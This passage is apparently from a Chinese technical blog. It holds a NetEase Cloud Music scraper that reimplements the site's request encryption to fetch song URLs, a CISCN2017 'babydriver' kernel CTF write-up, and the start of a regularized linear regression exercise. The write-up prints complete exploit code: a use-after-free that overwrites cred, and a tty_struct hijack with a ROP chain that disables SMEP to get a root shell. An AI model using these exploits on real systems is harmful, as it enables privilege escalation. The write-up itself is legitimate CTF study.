payload = 'params=' + parse.quote(params) + '&encSecKey=' + parse.quote(encSecKey)
headers = {
'authority': 'music.163.com',
'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.135 Safari/537.36',
'content-type': 'application/x-www-form-urlencoded',
'accept': '*/*',
'origin': 'https://music.163.com',
'sec-fetch-site': 'same-origin',
'sec-fetch-mode': 'cors',
'sec-fetch-dest': 'empty',
'referer': 'https://music.163.com/search/',
'accept-language': 'zh-CN,zh;q=0.9',
}
response = requests.request("POST", url, headers=headers, data=payload)
return response.text

def get_reply(self,params, encSecKey):
url = "https://music.163.com/weapi/song/enhance/player/url/v1?csrf_token="
payload = 'params=' + parse.quote(params) + '&encSecKey=' + parse.quote(encSecKey)
headers = {
'authority': 'music.163.com',
'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.135 Safari/537.36',
'content-type': 'application/x-www-form-urlencoded',
'accept': '*/*',
'origin': 'https://music.163.com',
'sec-fetch-site': 'same-origin',
'sec-fetch-mode': 'cors',
'sec-fetch-dest': 'empty',
'referer': 'https://music.163.com/',
'accept-language': 'zh-CN,zh;q=0.9'
}
response = requests.request("POST", url, headers=headers, data=payload)
return response.text

def choice(self,song_name_list,song_url_list,song_num):
num = eval(input("请输入播放编号:"))
if(num < song_num):
print("开始播放:"+song_name_list[num])
wb = webbrowser.get('windows-default')
wb.open(song_url_list[num])
else:
print("编号错误")

def start(self):
song_url_list = []
song_name_list = []
song_num = 0
song_search = input('请输入搜索目标,按回车键进行搜索:')
d = {"hlpretag": "<span class=\"s-fc7\">", "hlposttag": "</span>", "s": song_search, "type": "1", "offset": "0",
"total": "true", "limit": "30", "csrf_token": ""}
d = json.dumps(d)
random_param = self.get_random()
param = self.get_final_param(d, random_param)
song_list = self.get_music_list(param['params'], param['encSecKey'])
print('搜索结果如下:')
if len(song_list) > 0:
song_list = json.loads(song_list)['result']['songs']
for i, item in enumerate(song_list):
item = json.dumps(item)
song_name = json.loads(str(item))['name']
print(str(i) + ":" + song_name)
d = {"ids": "[" + str(json.loads(str(item))['id']) + "]", "level": "standard", "encodeType": "",
"csrf_token": ""}
d = json.dumps(d)
param = self.get_final_param(d, random_param)
song_info = self.get_reply(param['params'], param['encSecKey'])
if len(song_info) > 0:
song_info = json.loads(song_info)
song_url = json.dumps(song_info['data'][0]['url'], ensure_ascii=False)
song_name_list.append(song_name)
song_url_list.append(song_url)
else:
print("该首歌曲解析失败,可能是因为歌曲格式问题")
song_num = i+1
print("一共搜索到{}个目标".format(song_num))
self.choice(song_name_list,song_url_list,song_num)
else:
print("很抱歉,未能搜索到相关歌曲信息")

if __name__ == '__main__':
mus = Music()
mus.start()

效果展示:

PS:有些歌曲要 VIP,这个我可破解不了,当然也播放不了

更新日志:

  • version:v1.0

  • date:2022.5.19

  • type:

    • Features:NULL
    • Changed:NULL
    • Removed:NULL
  • desc:

    • 第一代版本,下一个版本打算加上 UI 界面,另外把 VIP 歌曲单独标记出来

白嫖网易云_V1.1

VIP 歌曲标记没有完成,但是 UI 界面做好了

  • PS:还是不会并发,所以爬虫工作的时候UI界面会卡顿
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
import base64
import binascii
import json
import random
import string
from urllib import parse

import requests
import webbrowser
from Crypto.Cipher import AES

import sys
import os
from PyQt5 import QtCore, QtGui, QtWidgets
from PyQt5.QtGui import *
from PyQt5.QtCore import *
from PyQt5.QtWidgets import *

class Music():
def get_random(self):
random_str = ''.join(random.sample(string.ascii_letters + string.digits, 16))
return random_str

def len_change(self,text):
pad = 16 - len(text) % 16
text = text + pad * chr(pad)
text = text.encode("utf-8")
return text

def aes(self,text, key):
iv = b'0102030405060708'
text = self.len_change(text)
cipher = AES.new(key.encode(), AES.MODE_CBC, iv)
encrypted = cipher.encrypt(text)
encrypt = base64.b64encode(encrypted).decode()
return encrypt

def b(self,text, str):
first_data = self.aes(text, '0CoJUm6Qyw8W8jud')
second_data = self.aes(first_data, str)
return second_data

def c(self,text):
e = '010001'
f = '00e0b509f6259df8642dbc35662901477df22677ec152b5ff68ace615bb7b725152b3ab17a876aea8a5aa76d2e417629ec4ee341f56135fccf695280104e0312ecbda92557c93870114af6c9d05c4f7f0c3685b7a46bee255932575cce10b424d813cfe4875d3e82047b97ddef52741d546b8e289dc6935b3ece0462db0a22b8e7'
text = text[::-1]
result = pow(int(binascii.hexlify(text.encode()), 16), int(e, 16), int(f, 16))
return format(result, 'x').zfill(131)

def get_final_param(self,text, str):
params = self.b(text, str)
encSecKey = self.c(str)
return {'params': params, 'encSecKey': encSecKey}

def get_music_list(self,params, encSecKey):
url = "https://music.163.com/weapi/cloudsearch/get/web?csrf_token="

payload = 'params=' + parse.quote(params) + '&encSecKey=' + parse.quote(encSecKey)
headers = {
'authority': 'music.163.com',
'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.135 Safari/537.36',
'content-type': 'application/x-www-form-urlencoded',
'accept': '*/*',
'origin': 'https://music.163.com',
'sec-fetch-site': 'same-origin',
'sec-fetch-mode': 'cors',
'sec-fetch-dest': 'empty',
'referer': 'https://music.163.com/search/',
'accept-language': 'zh-CN,zh;q=0.9',
}
response = requests.request("POST", url, headers=headers, data=payload)
return response.text

def get_reply(self,params, encSecKey):
url = "https://music.163.com/weapi/song/enhance/player/url/v1?csrf_token="
payload = 'params=' + parse.quote(params) + '&encSecKey=' + parse.quote(encSecKey)
headers = {
'authority': 'music.163.com',
'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.135 Safari/537.36',
'content-type': 'application/x-www-form-urlencoded',
'accept': '*/*',
'origin': 'https://music.163.com',
'sec-fetch-site': 'same-origin',
'sec-fetch-mode': 'cors',
'sec-fetch-dest': 'empty',
'referer': 'https://music.163.com/',
'accept-language': 'zh-CN,zh;q=0.9'
}
response = requests.request("POST", url, headers=headers, data=payload)
return response.text

def start(self,song_search):
song_url_list = []
song_name_list = []
song_num = 0
d = {"hlpretag": "<span class=\"s-fc7\">", "hlposttag": "</span>", "s": song_search, "type": "1", "offset": "0",
"total": "true", "limit": "30", "csrf_token": ""}
d = json.dumps(d)
random_param = self.get_random()
param = self.get_final_param(d, random_param)
song_list = self.get_music_list(param['params'], param['encSecKey'])
print('搜索结果如下:')
if len(song_list) > 0:
song_list = json.loads(song_list)['result']['songs']
for i, item in enumerate(song_list):
item = json.dumps(item)
song_name = json.loads(str(item))['name']
print(str(i) + ":" + song_name)
d = {"ids": "[" + str(json.loads(str(item))['id']) + "]", "level": "standard", "encodeType": "",
"csrf_token": ""}
d = json.dumps(d)
param = self.get_final_param(d, random_param)
song_info = self.get_reply(param['params'], param['encSecKey'])
if len(song_info) > 0:
song_info = json.loads(song_info)
song_url = json.dumps(song_info['data'][0]['url'], ensure_ascii=False)
song_name_list.append(song_name)
song_url_list.append(song_url)
else:
print("该首歌曲解析失败,可能是因为歌曲格式问题")
song_num = i+1
print("一共搜索到{}个目标".format(song_num))
return song_name_list,song_url_list
else:
return None

class MainWin(QtWidgets.QWidget):
def __init__(self,parent=None):
super(MainWin, self).__init__(parent)
self.song_result = ""
self.song_num = 0
self.layout = QGridLayout()
self.setWindowFlags(Qt.SubWindow)
self.setupUI()

def searchMusic(self):
print('* searchMusic ')
self.song_name_list = []
self.song_url_list = []
self.song_num = 0
self.song_result = ""
self.song_search = self.searchBox.text()
if len(self.song_search) == 0:
self.resultText.setText("请先输入歌曲名称")
return
mus = Music()
self.song_name_list,self.song_url_list=mus.start(self.song_search)
for song_name in self.song_name_list:
self.song_num += 1
self.song_result+=(str(self.song_num)+"."+str(song_name)+"\n")
self.song_result=self.song_result[:-1]
self.resultText.setText(self.song_result)

def choiceMusic(self):
print('* choiceMusic ')
self.song_choice = self.choiceBox.text()
if len(self.song_choice) == 0:
self.resultText.setText("请先输入编号")
return
self.song_choice = eval(self.song_choice)
if len(self.song_result) == 0:
self.resultText.setText("请先搜索歌曲")
return
if self.song_choice > self.song_num:
self.resultText.setText("输入的编号有误")
return
self.resultText.setText("开始播放:{}".format(self.song_name_list[self.song_choice-1]))
wb = webbrowser.get('windows-default')
wb.open(self.song_url_list[self.song_choice-1])

def quitWindows(self):
print('* quitWindows ')
self.close()

def setupUI(self):
self.resize(550,450)
self.groupBox = QtWidgets.QGroupBox(self)
self.groupBox.setGeometry(QtCore.QRect(10,10,530,430))
self.groupBox.setObjectName("groupBox")
self.groupBox.setStyleSheet("color:white")
self.searchBox = QtWidgets.QLineEdit(self.groupBox)
self.searchBox.setGeometry(QtCore.QRect(105,25,160,20))
self.searchBox.setObjectName("searchBox")
self.searchBox.setStyleSheet("color:black")
self.choiceBox = QtWidgets.QLineEdit(self.groupBox)
self.choiceBox.setGeometry(QtCore.QRect(105,315,160,20))
self.choiceBox.setObjectName("choiceBox")
self.choiceBox.setStyleSheet("color:black")
self.resultText = QtWidgets.QTextEdit(self.groupBox)
self.resultText.setGeometry(QtCore.QRect(20,60,260,240))
self.resultText.setObjectName("resultText")
self.resultText.setFont(QFont("微软雅黑",10,QFont.Bold))
self.resultText.setStyleSheet("color:black")
self.label = QtWidgets.QLabel(self.groupBox)
self.label.setGeometry(QtCore.QRect(20,20,80,30))
self.label.setObjectName("laber")
self.label2 = QtWidgets.QLabel(self.groupBox)
self.label2.setGeometry(QtCore.QRect(15,20,80,610))
self.label2.setObjectName("laber2")
self.searchButton = QtWidgets.QPushButton(self)
self.searchButton.setGeometry(QtCore.QRect(50,380,90,30))
self.searchButton.setObjectName("searchButton")
self.choiceButton = QtWidgets.QPushButton(self)
self.choiceButton.setGeometry(QtCore.QRect(160,380,90,30))
self.choiceButton.setObjectName("choiceButton")
self.quitButton = QtWidgets.QPushButton(self)
self.quitButton.setGeometry(QtCore.QRect(270,380,90,30))
self.quitButton.setObjectName("quitButton")

self.retranslateUI()
self.searchButton.clicked.connect(self.searchMusic)
self.choiceButton.clicked.connect(self.choiceMusic)
self.quitButton.clicked.connect(self.quitWindows)

QtCore.QMetaObject.connectSlotsByName(self)

def retranslateUI(self):
self.setWindowTitle("网易云API")
self.groupBox.setTitle("输入搜索的目标")
self.label.setText("歌曲&歌手")
self.label2.setText("请输入编号")
self.searchButton.setText("搜索")
self.choiceButton.setText("播放")
self.quitButton.setText("退出")

if __name__ == '__main__':
app = QtWidgets.QApplication(sys.argv)
win = MainWin()
palette = QPalette()
palette.setBrush(QPalette.Background, QBrush(QPixmap("D:\PythonProject\images\YHellow.png")))
win.setPalette(palette)
win.show()
sys.exit(app.exec_())

更新日志:

  • version:v1.1

  • date:2022.5.20

  • type:

    • Features:
      • 全新的 UI 界面
    • Changed:NULL
    • Removed:NULL
  • desc:

    • 本项目已相对完善,暂时不会更新了

babydriver 复现

首先使用 boot.sh 启动 kernel:

1
2
3
➜  babydriver ./boot.sh
Could not access KVM kernel module: No such file or directory
qemu-system-x86_64: failed to initialize KVM: No such file or directory

未能初始化 kvm,大概率是因为系统不支持虚拟化

可以通过如下命令检查是否支持:

1
egrep '^flags.*(vmx|svm)' /proc/cpuinfo 

如果输出 NULL 则代表不支持,具体的解决措施网上都有

然后用如下命令解压 rootfs.cpio:

1
2
mv ../rootfs.cpio rootfs.cpio.gz
gunzip ./rootfs.cpio.gz
  • PS:这个 rootfs.cpio 其实是个压缩包,不过它省略了后缀“.gz”,这里需要先改名后解压

用如下命令进行提取:

1
cpio -idmv < rootfs.cpio 

先看看 init:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
➜  babydriver cat init                            
#!/bin/sh

mount -t proc none /proc # mount:挂载
mount -t sysfs none /sys
mount -t devtmpfs devtmpfs /dev
chown root:root flag # 设置文件所有者和文件关联组(只有root权限才能拿flag)
chmod 400 flag

# 尖括号可以将数据从一个地方转移到另一个地方
exec 0</dev/console # 将/dev/console设备,重定向为标准输入
exec 1>/dev/console # 将标准输出,重定向为/dev/console设备
exec 2>/dev/console # 将标准错误,重定向为/dev/console设备

insmod /lib/modules/4.4.72/babydriver.ko # 添加了babydriver.ko驱动(可能有洞)
chmod 777 /dev/babydev # babydev全权限
echo -e "\nBoot took $(cut -d' ' -f1 /proc/uptime) seconds\n" # 打印一句话
setsid cttyhack setuidgid 1000 sh # 设置用户ID(和权限相关)

umount /proc # umount:取消挂载
umount /sys
poweroff -d 0 -f
  • 这个 babydev 是人为添加的一个文件,可以把它认为是一个虚拟外设(有点类似于键盘缓冲区之类的东西)

一般 kernel pwn 都会在驱动函数那里设置漏洞,把它拿出来:

1
2
3
4
5
6
7
➜  babydriver checksec babydriver.ko 
[*] '/home/yhellow/\xe6\xa1\x8c\xe9\x9d\xa2/CISCN2017_babydriver/babydriver/babydriver.ko'
Arch: amd64-64-little
RELRO: No RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x0)

用IDA分析 babydriver.ko:

  • 和上一个 kernel pwn 不同,这个 IDA 分析的还是很清楚的,原因就在于它没有去除符号表

init_module:初始化模块

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
void __fastcall init_module()
{
__int64 v0; // rax

if ( (int)alloc_chrdev_region(&babydev_no, 0LL, 1LL, "babydev") < 0 ) // 向内核申请设备号
{
printk("13alloc_chrdev_region failed\n");
return;
}
cdev_init(&cdev, &fops); // 初始化cdev结构体变量
qword_D60 = (__int64)&_this_module;
if ( (int)cdev_add(&cdev, (unsigned int)babydev_no, 1LL) >= 0 ) // 向Linux内核系统中添加一个新的cdev结构体变量所描述的字符设备
{
v0 = _class_create(&_this_module, "babydev", &babydev_no); // 创建一个设备类(有面向对象的味道)
babydev_class = v0;
if ( v0 )
{
if ( device_create(v0, 0LL, (unsigned int)babydev_no, 0LL, "babydev") ) // 创建对应的设备
return;
printk("13create device failed", 0LL, 0LL);
class_destroy(babydev_class); // 删除对应的设备
}
else
{
printk("13create class failed");
}
cdev_del(&cdev); // 用于从Linux内核系统中移除cdev结构体变量所描述的字符设备
}
else
{
printk("13cdev init failed\n");
}
unregister_chrdev_region((unsigned int)babydev_no, 1LL); // 释放原先申请的设备号
}
  • 值得注意的是:该程序把“驱动函数”和“babydev”进行了绑定(申请了一个名为“babydev”的设备,该驱动文件 babydriver.ko 就是为设备“babydev”为生的)

babyioctl:定义驱动函数

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
void __fastcall babyioctl(FILE *fp, unsigned int command, __int64 arg)
{
__int64 v3; // rdx
__int64 size; // rbx

_fentry__(fp, command); // 这里的fp是"文件指针"(fd是文件描述符)
size = v3;
if ( command == 0x10001 )
{
kfree(babydev_struct.device_buf);
babydev_struct.device_buf = _kmalloc(size, 0x24000C0LL);// void *kmalloc(size_t size, int flags)
babydev_struct.device_buf_len = size;
printk("alloc done\n");
}
else
{
printk("13defalut:arg is %ld\n", v3);
}
}
  • 定义了 0x10001 的命令:释放全局变量 babydev_struct 中的 device_buf,再根据用户传递的 size 重新申请一块内存,并设置 device_buf_len

babyopen:打开文件

1
2
3
4
5
6
7
void __fastcall babyopen(inode *inode, FILE *fp)
{
_fentry__(inode, fp);
babydev_struct.device_buf = kmem_cache_alloc_trace(kmalloc_caches[6], 0x24000C0LL, 64LL);
babydev_struct.device_buf_len = 64LL;
printk("device open\n");
}
  • 申请一块 64 字节的空间,地址存储在全局变量 babydev_struct.device_buf 上,并更新 babydev_struct.device_buf_len

babyread:读文件

1
2
3
4
5
6
7
8
9
10
11
void __fastcall babyread(FILE *fp, char *buf)
{
unsigned __int64 size; // rdx

_fentry__(fp, buf);
if ( babydev_struct.device_buf )
{
if ( babydev_struct.device_buf_len > size )
copy_to_user(buf, babydev_struct.device_buf, size);
}
}
  • 先检查 babydev_struct.device_buf 中是否有数据
  • 再检查用户申请的长度 size 是否大于 babydev_struct.device_buf
  • 然后调用 copy_to_user 把内核数据 babydev_struct.device_buf 拷贝到用户缓冲区 buf

babywrite:写文件

1
2
3
4
5
6
7
8
9
10
11
void __fastcall babywrite(FILE *fp, char *buf)
{
unsigned __int64 size; // rdx

_fentry__(fp, buf);
if ( babydev_struct.device_buf )
{
if ( babydev_struct.device_buf_len > size )
copy_from_user(babydev_struct.device_buf, buf, size);
}
}
  • 先检查 babydev_struct.device_buf 中是否有数据
  • 再检查用户申请的长度 size 是否大于 babydev_struct.device_buf
  • 然后调用 copy_from_user 把用户缓冲区 buf 拷贝到内核数据 babydev_struct.device_buf

babyrelease:关闭文件

1
2
3
4
5
6
void __fastcall babyrelease(inode *inode, FILE *fp)
{
_fentry__(inode, fp);
kfree(babydev_struct.device_buf);
printk("device release\n");
}
  • 释放空间

入侵思路

存在一个 伪条件竞争引发的UAF漏洞,即当我们同时打开两个设备,第二次会覆盖第一次分配的空间(因为 babydev_struct 是全局的),也就是说,两个设备共用了一个 babydev_struct

如果这时释放第一个,那么第二个其实是被释放过的,这样就造成了一个UAF,我们可以通过UAF修改 cred 结构体来提权

那么根据 UAF 的思想,入侵步骤如下:

  • 打开两次设备,通过 ioctl 更改其大小为 cred 结构体的大小
  • 释放其中一个,fork 一个新进程,那么这个新进程的 cred 的空间就会和之前释放的空间重叠
  • 同时,我们可以通过另一个文件描述符对这块空间写,只需要将 uid,gid 改为 0,即可以实现提权到 root

注意:fork() 在创建新进程时,会先 kmalloc 一个内存空间用于存放新进程的 cred,这时就会申请到我们可以控制的那片内存,从而修改 cred

分析官方exp:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
/* gcc exp.c -static -masm=intel -g -o exp */
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <fcntl.h>
//#include <stropts.h>
#include <sys/wait.h>
#include <sys/stat.h>

int main()
{
// 打开两次设备
int fd1 = open("/dev/babydev", 2);
int fd2 = open("/dev/babydev", 2);

ioctl(fd1, 0x10001, 0xa8); // 修改babydev_struct.device_buf_len为sizeof(cred)
close(fd1); // 释放fd1
int pid = fork(); // 新起进程的cred空间,会被申请到babydev_struct中
if(pid < 0)
{
puts("[*] fork error!");
exit(0);
}
else if(pid == 0)
{
// 通过更改fd2(操控babydev_struct),修改新进程的cred的uid,gid等值为'0'
char zeros[30] = {0};
write(fd2, zeros, 28);

if(getuid() == 0)
{
puts("[+] root now.");
system("/bin/sh");
exit(0);
}
}
else
{
wait(NULL);
}
close(fd2);

return 0;
}
  • 根据驱动函数:对文件描述符FD进行操作,就是直接控制“babydev_struct”,进而间接控制“cred”

bypass-smep

本题目还有另一种做法:绕过 smep 来实现 ret2usr(smep:当 CPU 处于 ring0 模式时,执行用户空间的代码会触发页错误)

  • 系统根据 CR4 寄存器的值判断是否开启 smep 保护
  • smep 开启:
1
$CR4 = 0x1407f0 = 10100 0000 0111 1111 0000
  • smep 关闭:
1
$CR4 = 0x1407e0 = 10100 0000 0111 1110 0000
  • 而 CR4 寄存器是可以通过 mov 指令修改的:
1
mov cr4, 0x1407e0

先用 extract-vmlinux 获取 vmlinux:

1
➜  babydriver ./extract-vmlinux ./bzImage > vmlinux

然后使用 Ropper 来寻找 gadget:

1
2
3
4
5
6
➜  babydriver time ropper --file ./vmlinux --nocolor > g1
[INFO] Load gadgets for section: LOAD
[LOAD] loading... 100%
[LOAD] removing double gadgets... 100%

ropper --file ./vmlinux --nocolor > g1 234.87s user 32.60s system 139% cpu 3:11.53 total

先写一个脚本来查找“commit_creds”和“prepare_kernel_cred”(没有开 PIE 和 Kaslr)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>

size_t commit_creds = 0;
size_t prepare_kernel_cred = 0;

size_t find_symbols()
{
FILE* kallsyms_fd = fopen("/proc/kallsyms", "r");

if(kallsyms_fd < 0)
{
puts("[*]open kallsyms error!");
exit(0);
}

char buf[0x30] = {0};
while(fgets(buf, 0x30, kallsyms_fd))
{
if(commit_creds & prepare_kernel_cred)
return 0;

if(strstr(buf, "commit_creds") && !commit_creds)
{
char hex[20] = {0};
strncpy(hex, buf, 16);
sscanf(hex, "%llx", &commit_creds);
printf("commit_creds addr: %p\n", commit_creds);
}

if(strstr(buf, "prepare_kernel_cred") && !prepare_kernel_cred)
{
char hex[20] = {0};
strncpy(hex, buf, 16);
sscanf(hex, "%llx", &prepare_kernel_cred);
printf("prepare_kernel_cred addr: %p\n", prepare_kernel_cred);
}
}

if(!(prepare_kernel_cred & commit_creds))
{
puts("[*]Error!");
exit(0);
}
}

int main(){
find_symbols();
return 0;
}
1
2
3
/ $ /tmp/find 
commit_creds addr: 0xffffffff810a1420
prepare_kernel_cred addr: 0xffffffff810a1810

接下来就说一下攻击的原理:

  • 先通过 uaf 控制一个 tty_struct 结构(在 open("/dev/ptmx", O_RDWR) 时会分配)
  • tty_struct->tty_operations 中有许多函数指针可以用来劫持
  • 进行 stack pivot(栈迁移)到 rop 链的空间

官方exp:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>

#define prepare_kernel_cred_addr 0xffffffff810a1810
#define commit_creds_addr 0xffffffff810a1420

void* fake_tty_operations[30];

size_t user_cs, user_ss, user_rflags, user_sp;
void save_status()
{
__asm__("mov user_cs, cs;"
"mov user_ss, ss;"
"mov user_sp, rsp;"
"pushf;"
"pop user_rflags;"
);
puts("[*]status has been saved.");
}

void get_shell()
{
system("/bin/sh");
}

void get_root()
{
char* (*pkc)(int) = prepare_kernel_cred_addr;
void (*cc)(char*) = commit_creds_addr;
(*cc)((*pkc)(0));
}

int main()
{
save_status();

int i = 0;
size_t rop[32] = {0};
rop[i++] = 0xffffffff810d238d; // pop rdi; ret;
rop[i++] = 0x6f0;
rop[i++] = 0xffffffff81004d80; // mov cr4, rdi; pop rbp; ret;
rop[i++] = 0;
rop[i++] = (size_t)get_root;
rop[i++] = 0xffffffff81063694; // swapgs; pop rbp; ret;
rop[i++] = 0;
rop[i++] = 0xffffffff814e35ef; // iretq; ret;
rop[i++] = (size_t)get_shell;
rop[i++] = user_cs; /* saved CS */
rop[i++] = user_rflags; /* saved EFLAGS */
rop[i++] = user_sp;
rop[i++] = user_ss;

for(int i = 0; i < 30; i++)
{
fake_tty_operations[i] = 0xFFFFFFFF8181BFC5;
}
fake_tty_operations[0] = 0xffffffff810635f5; // pop rax; pop rbp; ret;
fake_tty_operations[1] = (size_t)rop;
fake_tty_operations[3] = 0xFFFFFFFF8181BFC5; // mov rsp,rax ; dec ebx ; ret

int fd1 = open("/dev/babydev", O_RDWR);
int fd2 = open("/dev/babydev", O_RDWR);
ioctl(fd1, 0x10001, 0x2e0);
close(fd1);

int fd_tty = open("/dev/ptmx", O_RDWR|O_NOCTTY); // tty_struct已经申请到babydev_struct中
size_t fake_tty_struct[4] = {0};
read(fd2, fake_tty_struct, 32); // 把tty_struct读取到fake_tty_struct
fake_tty_struct[3] = (size_t)fake_tty_operations; // 修改tty_operations指向fake_tty_operations
write(fd2,fake_tty_struct, 32); // 用fake_tty_struct覆盖tty_struct

char buf[0x8] = {0}; // buf压栈,作为栈迁移的跳板
write(fd_tty, buf, 8);

return 0;
}

为了理解这个 exp,我们调试一下:

  • 获取 babydrive 模块的加载地址:(在 “/sys/module/” 中是加载的各个模块的信息)
1
2
/ $ cat /sys/module/babydriver/sections/.text 
0xffffffffc0000000
  • 使用 add-symbol-file 添加符号
1
2
3
4
pwndbg> add-symbol-file babydriver.ko 0xffffffffc0000000
add symbol table from file "babydriver.ko" at
.text_addr = 0xffffffffc0000000
Reading symbols from babydriver.ko...
  • 在执行“write(fd_tty, buf, 8)”(“fake_tty_operations[7]-0xffffffff8181bfc5”)前停止
  • 此时RAX为:“fake_tty_operations[0]-0xffffffff810635f5”(通过这个“rax + 0x38”可以看出来)
  • 接下来就会执行:“mov rsp,rax ; dec ebx ; ret”(“fake_tty_operations[7]-0xffffffff8181bfc5”)
  • 栈迁移为:“fake_tty_operations[0]-0xffffffff810635f5”
  • 接着“ret”执行ROP链(“fake_tty_operations[1]”)
  • 最后在ROP链中 bypass-smep,并且用 ret2usr 进行提权

这里我要吐槽一句:kernel 的调试实在是太慢了,“ni”要足足执行一秒钟,还有这个 exp 是打不通的,必须把 boot.sh 中的 -enable-kvm 去掉才可以打通(快搞死我了)


小结:

这是我的第二个 kernel pwn,感觉顺畅多了,这个题目给我提供了另一个提权的思路:UAF

目前有许多概念很是陌生,比如这个“cdev结构体”,我感觉它和 ucore 中的“vdev结构体”很像,但是就是不了解“cdev结构体”与其背后的机制

从 ucore 到 Linux 还是有距离的,那天抽时间整理一下 Linux 内核的知识

还有 kernel 是真的不好调试,太慢了

实验介绍

在本练习中,您将实现正则化线性回归,并使用它来研究具有不同偏差-方差特性的模型

  • ex5.m - Octave/MATLAB脚本,帮助您完成练习
  • ex5data1.mat - 数据集
  • submit.m - 将您的解决方案发送到我们的服务器
  • featureNormalize.m - 标准化函数
  • fmincg.m - 拟合函数,最小化例程(类似于fminunc)
  • plotFit.m - 绘制多项式拟合图
  • trainLinearReg.m - 使用 fmincg 训练线性回归(代价函数为:均方误差)
  • [?] linearRegCostFunction.m - 正则线性回归代价函数
  • [?] learningCurve.m - 生成学习曲线
  • [?] polyFeatures.m - 将数据映射到多项式特征空间
  • [?] validationCurve.m - 生成交叉验证曲线

Regularized Linear Regression(正则线性回归)

在本练习的前半部分,您将使用正则化线性回归,利用水库水位的变化来预测流出大坝的水量,在下半部分中,您将完成一些调试学习算法的诊断,并检查偏差与方差的影响

Visualizing the dataset(可视化数据集)

首先,我们将可视化数据集,其中包含:

  • 水位变化的历史记录 x
  • 流出大坝的水量 y

该数据集分为三个部分:

  • 你的模型将学习的训练集:X,y
  • 用于确定正则化参数的交叉验证集:Xval,yval
  • 用于评估性能的测试集,这些是您的模型在培训期间没有看到的“看不见的”示例:Xtest、ytest

代码实现:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
# ============================== 1.读取并显示数据 ==============================
data = scio.loadmat('data\ex5data1.mat')
# 用于训练模型
X = data['X']
Y = data['y'].flatten()
# 用于确定正则化参数的交叉验证
Xval = data['Xval']
Yval = data['yval'].flatten()
# 用于评估性能
Xtest = data['Xtest']
Ytest = data['ytest'].flatten()

plt.figure(1)
plt.scatter(X,Y,c='r',marker='x') # 只显示"用于训练模型"的数据
plt.xlabel('Change in water level (x)')
plt.ylabel('Water folowing out of the dam (y)')
plt.show()

Regularized linear regression cost function(正则线性回归代价函数)

先看下正则化均方误差的公式:

  • 其中 λ 是控制正则化程度的正则化参数(因此,有助于防止过度拟合)
  • 正则化项对总成本 J(θ) 施加惩罚,随着模型参数 θ 的大小增加,惩罚也增加
  • 注意:不应该正则化θ0项(在 Octave/MATLAB 中,θ0 项表示为 θ(1) ,因为 Octave/MATLAB 中的索引从1开始)

相应地,正则化线性回归的代价对 θj 的偏导数定义为:

  • 注意:导数和梯度是一个概念,求解偏导数,就是求解梯度

现在,您应该完成文件 linearRegCostFunction.m 中的代码,您的任务是编写一个函数来计算正则化线性回归成本函数,如果可能,尝试将代码矢量化,避免编写循环,然后在本函数中添加代码来计算梯度,并返回变量 grad

实现 linearRegCostFunction 函数:正则线性回归代价函数(均方误差)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
"""计算线性回归的代价和梯度"""
import numpy as np

def linear_cost_function(X,Y,theta,lmd):
m = X.shape[0]
hyp = X.dot(theta) - Y
grad = np.zeros(theta.shape)

cost = ((hyp.T).dot(hyp) + lmd * (theta.T).dot(theta))/(2*m)

temp = (X.T).dot(hyp)
grad[0] = temp[0]/ m
grad[1:] = (temp[1:] + lmd * theta[1:])/m

return cost,grad
  • 就是实现了一下上述公式,和实验二的 cost_Function_Reg 一样

具体过程:

1
2
3
4
5
6
7
# ============================ 2.计算代价和梯度 ==============================
(m,n)= X.shape
theta = np.ones((n+1))
lmd=1
cost,grad = linear_cost_function(np.column_stack((np.ones(m),X)),Y,theta,lmd)
